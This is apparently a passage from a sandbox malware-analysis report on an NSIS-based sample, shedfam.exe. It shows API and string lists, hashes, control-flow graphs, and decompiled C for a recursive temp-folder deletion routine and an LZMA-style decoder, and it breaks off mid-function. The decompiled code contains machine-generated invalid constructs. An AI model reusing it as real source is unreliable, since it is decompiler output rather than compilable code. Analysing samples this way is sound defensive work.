                                                                  • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
                                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\shedfam.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\shedfam.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
                                                                  • API String ID: 2193684524-2617628145
                                                                  • Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                                  • Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
                                                                  • Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                                  • Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 279 405620-40563b call 4058cf 282 405654-40565e 279->282 283 40563d-40564f DeleteFileA 279->283 285 405660-405662 282->285 286 405672-405680 call 405cfb 282->286 284 4057e8-4057eb 283->284 287 405793-405799 285->287 288 405668-40566c 285->288 294 405682-40568d lstrcatA 286->294 295 40568f-405690 call 405835 286->295 287->284 290 40579b-40579e 287->290 288->286 288->287 292 4057a0-4057a6 290->292 293 4057a8-4057b0 call 405ff6 290->293 292->284 293->284 303 4057b2-4057c7 call 4057ee call 4059b3 RemoveDirectoryA 293->303 297 405695-405698 294->297 295->297 300 4056a3-4056a9 lstrcatA 297->300 301 40569a-4056a1 297->301 302 4056ae-4056cc lstrlenA FindFirstFileA 300->302 301->300 301->302 304 4056d2-4056e9 call 405819 302->304 305 405789-40578d 302->305 318 4057e0-4057e3 call 404fe7 303->318 319 4057c9-4057cd 303->319 312 4056f4-4056f7 304->312 313 4056eb-4056ef 304->313 305->287 307 40578f 305->307 307->287 316 4056f9-4056fe 312->316 317 40570a-405718 call 405cfb 312->317 313->312 315 4056f1 313->315 315->312 321 405700-405702 316->321 322 405768-40577a FindNextFileA 316->322 329 40571a-405722 317->329 330 40572f-40573e call 4059b3 DeleteFileA 317->330 318->284 319->292 324 4057cf-4057de call 404fe7 call 405a49 319->324 321->317 325 405704-405708 321->325 322->304 327 405780-405783 FindClose 322->327 324->284 325->317 325->322 327->305 329->322 334 405724-40572d call 405620 329->334 339 405760-405763 call 404fe7 330->339 340 405740-405744 330->340 334->322 339->322 341 405746-405756 call 404fe7 call 405a49 340->341 342 405758-40575e 340->342 341->322 342->322
                                                                  C-Code - Quality: 94%
                                                                  			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				struct _WIN32_FIND_DATAA _v332;
                                                                  				signed int _t37;
                                                                  				char* _t49;
                                                                  				signed int _t52;
                                                                  				signed int _t55;
                                                                  				signed int _t61;
                                                                  				signed int _t63;
                                                                  				void* _t65;
                                                                  				signed int _t68;
                                                                  				CHAR* _t70;
                                                                  				CHAR* _t72;
                                                                  				char* _t75;
                                                                  
                                                                  				_t72 = _a4;
                                                                  				_t37 = E004058CF(__eflags, _t72);
                                                                  				_v12 = _t37;
                                                                  				if((_a8 & 0x00000008) != 0) {
                                                                  					_t63 = DeleteFileA(_t72); // executed
                                                                  					asm("sbb eax, eax");
                                                                  					_t65 =  ~_t63 + 1;
                                                                  					 *0x424008 =  *0x424008 + _t65;
                                                                  					return _t65;
                                                                  				}
                                                                  				_t68 = _a8 & 0x00000001;
                                                                  				__eflags = _t68;
                                                                  				_v8 = _t68;
                                                                  				if(_t68 == 0) {
                                                                  					L5:
                                                                  					E00405CFB(0x421588, _t72);
                                                                  					__eflags = _t68;
                                                                  					if(_t68 == 0) {
                                                                  						E00405835(_t72);
                                                                  					} else {
                                                                  						lstrcatA(0x421588, "\*.*");
                                                                  					}
                                                                  					__eflags =  *_t72;
                                                                  					if( *_t72 != 0) {
                                                                  						L10:
                                                                  						lstrcatA(_t72, 0x409010);
                                                                  						L11:
                                                                  						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
                                                                  						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
                                                                  						__eflags = _t37 - 0xffffffff;
                                                                  						_a4 = _t37;
                                                                  						if(_t37 == 0xffffffff) {
                                                                  							L29:
                                                                  							__eflags = _v8;
                                                                  							if(_v8 != 0) {
                                                                  								_t31 = _t70 - 1;
                                                                  								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                  								__eflags =  *_t31;
                                                                  							}
                                                                  							goto L31;
                                                                  						} else {
                                                                  							goto L12;
                                                                  						}
                                                                  						do {
                                                                  							L12:
                                                                  							_t75 =  &(_v332.cFileName);
                                                                  							_t49 = E00405819( &(_v332.cFileName), 0x3f);
                                                                  							__eflags =  *_t49;
                                                                  							if( *_t49 != 0) {
                                                                  								__eflags = _v332.cAlternateFileName;
                                                                  								if(_v332.cAlternateFileName != 0) {
                                                                  									_t75 =  &(_v332.cAlternateFileName);
                                                                  								}
                                                                  							}
                                                                  							__eflags =  *_t75 - 0x2e;
                                                                  							if( *_t75 != 0x2e) {
                                                                  								L19:
                                                                  								E00405CFB(_t70, _t75);
                                                                  								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                  								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                  									E004059B3(_t72);
                                                                  									_t52 = DeleteFileA(_t72);
                                                                  									__eflags = _t52;
                                                                  									if(_t52 != 0) {
                                                                  										E00404FE7(0xfffffff2, _t72);
                                                                  									} else {
                                                                  										__eflags = _a8 & 0x00000004;
                                                                  										if((_a8 & 0x00000004) == 0) {
                                                                  											 *0x424008 =  *0x424008 + 1;
                                                                  										} else {
                                                                  											E00404FE7(0xfffffff1, _t72);
                                                                  											_push(0);
                                                                  											_push(_t72);
                                                                  											E00405A49(__eflags);
                                                                  										}
                                                                  									}
                                                                  								} else {
                                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                                  									if(__eflags == 0) {
                                                                  										E00405620(_t70, __eflags, _t72, _a8);
                                                                  									}
                                                                  								}
                                                                  								goto L27;
                                                                  							}
                                                                  							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                  							__eflags = _t61;
                                                                  							if(_t61 == 0) {
                                                                  								goto L27;
                                                                  							}
                                                                  							__eflags = _t61 - 0x2e;
                                                                  							if(_t61 != 0x2e) {
                                                                  								goto L19;
                                                                  							}
                                                                  							__eflags =  *((char*)(_t75 + 2));
                                                                  							if( *((char*)(_t75 + 2)) == 0) {
                                                                  								goto L27;
                                                                  							}
                                                                  							goto L19;
                                                                  							L27:
                                                                  							_t55 = FindNextFileA(_a4,  &_v332); // executed
                                                                  							__eflags = _t55;
                                                                  						} while (_t55 != 0);
                                                                  						_t37 = FindClose(_a4); // executed
                                                                  						goto L29;
                                                                  					}
                                                                  					__eflags =  *0x421588 - 0x5c;
                                                                  					if( *0x421588 != 0x5c) {
                                                                  						goto L11;
                                                                  					}
                                                                  					goto L10;
                                                                  				} else {
                                                                  					__eflags = _t37;
                                                                  					if(_t37 == 0) {
                                                                  						L31:
                                                                  						__eflags = _v8;
                                                                  						if(_v8 == 0) {
                                                                  							L39:
                                                                  							return _t37;
                                                                  						}
                                                                  						__eflags = _v12;
                                                                  						if(_v12 != 0) {
                                                                  							_t37 = E00405FF6(_t72);
                                                                  							__eflags = _t37;
                                                                  							if(_t37 == 0) {
                                                                  								goto L39;
                                                                  							}
                                                                  							E004057EE(_t72);
                                                                  							E004059B3(_t72);
                                                                  							_t37 = RemoveDirectoryA(_t72); // executed
                                                                  							__eflags = _t37;
                                                                  							if(_t37 != 0) {
                                                                  								return E00404FE7(0xffffffe5, _t72);
                                                                  							}
                                                                  							__eflags = _a8 & 0x00000004;
                                                                  							if((_a8 & 0x00000004) == 0) {
                                                                  								goto L33;
                                                                  							}
                                                                  							E00404FE7(0xfffffff1, _t72);
                                                                  							_push(0);
                                                                  							_push(_t72);
                                                                  							return E00405A49(__eflags);
                                                                  						}
                                                                  						L33:
                                                                  						 *0x424008 =  *0x424008 + 1;
                                                                  						return _t37;
                                                                  					}
                                                                  					__eflags = _a8 & 0x00000002;
                                                                  					if((_a8 & 0x00000002) == 0) {
                                                                  						goto L31;
                                                                  					}
                                                                  					goto L5;
                                                                  				}
                                                                  			}

















                                                                  0x0040562b
                                                                  0x0040562f
                                                                  0x00405638
                                                                  0x0040563b
                                                                  0x0040563e
                                                                  0x00405646
                                                                  0x00405648
                                                                  0x00405649
                                                                  0x00000000
                                                                  0x00405649
                                                                  0x00405658
                                                                  0x00405658
                                                                  0x0040565b
                                                                  0x0040565e
                                                                  0x00405672
                                                                  0x00405679
                                                                  0x0040567e
                                                                  0x00405680
                                                                  0x00405690
                                                                  0x00405682
                                                                  0x00405688
                                                                  0x00405688
                                                                  0x00405695
                                                                  0x00405698
                                                                  0x004056a3
                                                                  0x004056a9
                                                                  0x004056ae
                                                                  0x004056be
                                                                  0x004056c0
                                                                  0x004056c6
                                                                  0x004056c9
                                                                  0x004056cc
                                                                  0x00405789
                                                                  0x00405789
                                                                  0x0040578d
                                                                  0x0040578f
                                                                  0x0040578f
                                                                  0x0040578f
                                                                  0x0040578f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004056d2
                                                                  0x004056d2
                                                                  0x004056db
                                                                  0x004056e1
                                                                  0x004056e6
                                                                  0x004056e9
                                                                  0x004056eb
                                                                  0x004056ef
                                                                  0x004056f1
                                                                  0x004056f1
                                                                  0x004056ef
                                                                  0x004056f4
                                                                  0x004056f7
                                                                  0x0040570a
                                                                  0x0040570c
                                                                  0x00405711
                                                                  0x00405718
                                                                  0x00405730
                                                                  0x00405736
                                                                  0x0040573c
                                                                  0x0040573e
                                                                  0x00405763
                                                                  0x00405740
                                                                  0x00405740
                                                                  0x00405744
                                                                  0x00405758
                                                                  0x00405746
                                                                  0x00405749
                                                                  0x0040574e
                                                                  0x00405750
                                                                  0x00405751
                                                                  0x00405751
                                                                  0x00405744
                                                                  0x0040571a
                                                                  0x00405720
                                                                  0x00405722
                                                                  0x00405728
                                                                  0x00405728
                                                                  0x00405722
                                                                  0x00000000
                                                                  0x00405718
                                                                  0x004056f9
                                                                  0x004056fc
                                                                  0x004056fe
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405700
                                                                  0x00405702
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405704
                                                                  0x00405708
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405768
                                                                  0x00405772
                                                                  0x00405778
                                                                  0x00405778
                                                                  0x00405783
                                                                  0x00000000
                                                                  0x00405783
                                                                  0x0040569a
                                                                  0x004056a1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405660
                                                                  0x00405660
                                                                  0x00405662
                                                                  0x00405793
                                                                  0x00405796
                                                                  0x00405799
                                                                  0x004057eb
                                                                  0x004057eb
                                                                  0x004057eb
                                                                  0x0040579b
                                                                  0x0040579e
                                                                  0x004057a9
                                                                  0x004057ae
                                                                  0x004057b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004057b3
                                                                  0x004057b9
                                                                  0x004057bf
                                                                  0x004057c5
                                                                  0x004057c7
                                                                  0x00000000
                                                                  0x004057e3
                                                                  0x004057c9
                                                                  0x004057cd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004057d2
                                                                  0x004057d7
                                                                  0x004057d8
                                                                  0x00000000
                                                                  0x004057d9
                                                                  0x004057a0
                                                                  0x004057a0
                                                                  0x00000000
                                                                  0x004057a0
                                                                  0x00405668
                                                                  0x0040566c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040566c

                                                                  APIs
                                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 0040563E
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405688
                                                                  • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 004056A9
                                                                  • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 004056AF
                                                                  • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 004056C0
                                                                  • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
                                                                  • FindClose.KERNELBASE(?), ref: 00405783
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\shedfam.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse13EA.tmp\*.*$\*.*
                                                                  • API String ID: 2035342205-995754795
                                                                  • Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                                  • Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
                                                                  • Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                                  • Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 559 406333-406338 560 4063a9-4063c7 559->560 561 40633a-406369 559->561 564 40699f-4069b4 560->564 562 406370-406374 561->562 563 40636b-40636e 561->563 566 406376-40637a 562->566 567 40637c 562->567 565 406380-406383 563->565 568 4069b6-4069cc 564->568 569 4069ce-4069e4 564->569 570 4063a1-4063a4 565->570 571 406385-40638e 565->571 566->565 567->565 572 4069e7-4069ee 568->572 569->572 575 406576-406594 570->575 573 406390 571->573 574 406393-40639f 571->574 576 4069f0-4069f4 572->576 577 406a15-406a21 572->577 573->574 580 406409-406437 574->580 578 406596-4065aa 575->578 579 4065ac-4065be 575->579 581 406ba3-406bad 576->581 582 4069fa-406a12 576->582 584 4061b7-4061c0 577->584 587 4065c1-4065cb 578->587 579->587 585 406453-40646d 580->585 586 406439-406451 580->586 588 406bb9-406bcc 581->588 582->577 593 4061c6 584->593 594 406bce 584->594 589 406470-40647a 585->589 586->589 590 4065cd 587->590 591 40656e-406574 587->591 592 406bd1-406bd5 588->592 600 406480 589->600 601 4063f1-4063f7 589->601 602 406549-40654d 590->602 603 4066de-4066eb 590->603 591->575 599 406512-40651c 591->599 595 406272-406276 593->595 596 4062e2-4062e6 593->596 597 4061cd-4061d1 593->597 598 40630d-40632e 593->598 594->592 610 406b22-406b2c 595->610 611 40627c-406295 595->611 607 406b31-406b3b 596->607 608 4062ec-406300 596->608 597->588 604 4061d7-4061e4 597->604 598->564 612 406b61-406b6b 599->612 613 406522-406544 599->613 621 4063d6-4063ee 600->621 622 406b3d-406b47 600->622 614 4064aa-4064b0 601->614 615 4063fd-406403 601->615 605 406553-40656b 602->605 606 406b55-406b5f 602->606 603->584 604->594 617 4061ea-406230 604->617 605->591 606->588 607->588 618 406303-40630b 608->618 610->588 620 406298-40629c 611->620 612->588 613->603 616 40650e 614->616 619 4064b2-4064d0 614->619 615->580 615->616 616->599 623 406232-406236 617->623 624 406258-40625a 617->624 618->596 618->598 625 4064d2-4064e6 619->625 626 4064e8-4064fa 619->626 620->595 627 40629e-4062a4 620->627 621->601 622->588 628 406241-40624f GlobalAlloc 623->628 629 406238-40623b GlobalFree 623->629 630 406268-406270 624->630 631 40625c-406266 624->631 632 4064fd-406507 625->632 626->632 633 4062a6-4062ad 627->633 634 4062ce-4062e0 627->634 628->594 635 406255 628->635 629->628 630->620 631->630 631->631 632->614 636 406509 632->636 637 4062b8-4062c8 GlobalAlloc 633->637 638 4062af-4062b2 GlobalFree 633->638 634->618 635->624 640 406b49-406b53 636->640 641 40648f-4064a7 636->641 637->594 637->634 638->637 640->588 641->614
                                                                  C-Code - Quality: 98%
                                                                  			E00406333() {
                                                                  				unsigned short _t531;
                                                                  				signed int _t532;
                                                                  				void _t533;
                                                                  				void* _t534;
                                                                  				signed int _t535;
                                                                  				signed int _t565;
                                                                  				signed int _t568;
                                                                  				signed int _t590;
                                                                  				signed int* _t607;
                                                                  				void* _t614;
                                                                  
                                                                  				L0:
                                                                  				while(1) {
                                                                  					L0:
                                                                  					if( *(_t614 - 0x40) != 0) {
                                                                  						 *(_t614 - 0x34) = 1;
                                                                  						 *(_t614 - 0x84) = 7;
                                                                  						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                  						L132:
                                                                  						 *(_t614 - 0x54) = _t607;
                                                                  						L133:
                                                                  						_t531 =  *_t607;
                                                                  						_t590 = _t531 & 0x0000ffff;
                                                                  						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                  						if( *(_t614 - 0xc) >= _t565) {
                                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                  							 *(_t614 - 0x40) = 1;
                                                                  							_t532 = _t531 - (_t531 >> 5);
                                                                  							 *_t607 = _t532;
                                                                  						} else {
                                                                  							 *(_t614 - 0x10) = _t565;
                                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                  							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                  						}
                                                                  						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                  							L139:
                                                                  							_t533 =  *(_t614 - 0x84);
                                                                  							L140:
                                                                  							 *(_t614 - 0x88) = _t533;
                                                                  							goto L1;
                                                                  						} else {
                                                                  							L137:
                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                  								 *(_t614 - 0x88) = 5;
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                  							goto L139;
                                                                  						}
                                                                  					} else {
                                                                  						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                  						__esi =  *(__ebp - 0x60);
                                                                  						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                  						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                  						__ecx =  *(__ebp - 0x3c);
                                                                  						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                  						__ecx =  *(__ebp - 4);
                                                                  						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                  						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                  						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  						if( *(__ebp - 0x38) >= 4) {
                                                                  							if( *(__ebp - 0x38) >= 0xa) {
                                                                  								_t97 = __ebp - 0x38;
                                                                  								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                  							} else {
                                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                  							}
                                                                  						} else {
                                                                  							 *(__ebp - 0x38) = 0;
                                                                  						}
                                                                  						if( *(__ebp - 0x34) == __edx) {
                                                                  							__ebx = 0;
                                                                  							__ebx = 1;
                                                                  							L60:
                                                                  							__eax =  *(__ebp - 0x58);
                                                                  							__edx = __ebx + __ebx;
                                                                  							__ecx =  *(__ebp - 0x10);
                                                                  							__esi = __edx + __eax;
                                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  							__ax =  *__esi;
                                                                  							 *(__ebp - 0x54) = __esi;
                                                                  							__edi = __ax & 0x0000ffff;
                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  								__cx = __ax;
                                                                  								_t216 = __edx + 1; // 0x1
                                                                  								__ebx = _t216;
                                                                  								__cx = __ax >> 5;
                                                                  								 *__esi = __ax;
                                                                  							} else {
                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                  								0x800 = 0x800 - __edi;
                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  								L59:
                                                                  								if(__ebx >= 0x100) {
                                                                  									goto L54;
                                                                  								}
                                                                  								goto L60;
                                                                  							} else {
                                                                  								L57:
                                                                  								if( *(__ebp - 0x6c) == 0) {
                                                                  									 *(__ebp - 0x88) = 0xf;
                                                                  									goto L170;
                                                                  								}
                                                                  								__ecx =  *(__ebp - 0x70);
                                                                  								__eax =  *(__ebp - 0xc);
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  								_t202 = __ebp - 0x70;
                                                                  								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  								goto L59;
                                                                  							}
                                                                  						} else {
                                                                  							__eax =  *(__ebp - 0x14);
                                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  							if(__eax >=  *(__ebp - 0x74)) {
                                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                                  							}
                                                                  							__ecx =  *(__ebp - 8);
                                                                  							__ebx = 0;
                                                                  							__ebx = 1;
                                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                  							L40:
                                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                  							__ecx =  *(__ebp - 0x58);
                                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                  							 *(__ebp - 0x48) = __eax;
                                                                  							__eax = __eax + 1;
                                                                  							__eax = __eax << 8;
                                                                  							__eax = __eax + __ebx;
                                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  							__ax =  *__esi;
                                                                  							 *(__ebp - 0x54) = __esi;
                                                                  							__edx = __ax & 0x0000ffff;
                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  								__cx = __ax;
                                                                  								 *(__ebp - 0x40) = 1;
                                                                  								__cx = __ax >> 5;
                                                                  								__ebx = __ebx + __ebx + 1;
                                                                  								 *__esi = __ax;
                                                                  							} else {
                                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                  								0x800 = 0x800 - __edx;
                                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  								L38:
                                                                  								__eax =  *(__ebp - 0x40);
                                                                  								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                  									while(1) {
                                                                  										if(__ebx >= 0x100) {
                                                                  											break;
                                                                  										}
                                                                  										__eax =  *(__ebp - 0x58);
                                                                  										__edx = __ebx + __ebx;
                                                                  										__ecx =  *(__ebp - 0x10);
                                                                  										__esi = __edx + __eax;
                                                                  										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  										__ax =  *__esi;
                                                                  										 *(__ebp - 0x54) = __esi;
                                                                  										__edi = __ax & 0x0000ffff;
                                                                  										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  										if( *(__ebp - 0xc) >= __ecx) {
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  											__cx = __ax;
                                                                  											_t169 = __edx + 1; // 0x1
                                                                  											__ebx = _t169;
                                                                  											__cx = __ax >> 5;
                                                                  											 *__esi = __ax;
                                                                  										} else {
                                                                  											 *(__ebp - 0x10) = __ecx;
                                                                  											0x800 = 0x800 - __edi;
                                                                  											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  											__ebx = __ebx + __ebx;
                                                                  											 *__esi = __cx;
                                                                  										}
                                                                  										 *(__ebp - 0x44) = __ebx;
                                                                  										if( *(__ebp - 0x10) < 0x1000000) {
                                                                  											L45:
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                  												goto L170;
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t155 = __ebp - 0x70;
                                                                  											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  										}
                                                                  									}
                                                                  									L53:
                                                                  									_t172 = __ebp - 0x34;
